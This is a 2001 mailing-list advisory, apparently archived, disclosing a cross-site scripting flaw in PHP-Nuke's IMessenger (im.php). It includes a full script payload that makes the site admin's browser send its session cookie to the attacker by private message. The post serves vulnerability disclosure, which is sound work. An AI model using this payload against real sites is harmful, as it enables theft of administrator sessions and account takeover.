Related information

Crossite scripting in PHPNuke/PostNUKE

More Cross site Scripting in PHPNuke

Security bugs in PhpNuke

PHP-Nuke 5.5 , Phortail 1.2.1 , Avotravis 2.1

CSS in PHPNuke add-on

From:	frog frog <leseulfrog_(at)_hotmail.com>
Date:	17.12.2001
Subject:	Security hole in IMessenger ( PHP-Nuke )

There is a big hole in imessenger (im.php). He
accept javascript... if I send

<*s*cript>window.location.href='http://www.
[SERVER].com/im.php?username_to= [MY_NICK]
&subject='+ document.cookie
+'&message=message&action=send' ;</script>

(without '*') to the admin, he send his cookie.

PHPNuke has been alerted.
There's a tut (french) here :

http://balteam.multimania.com/Tuts/imhole.txt

frog-m@n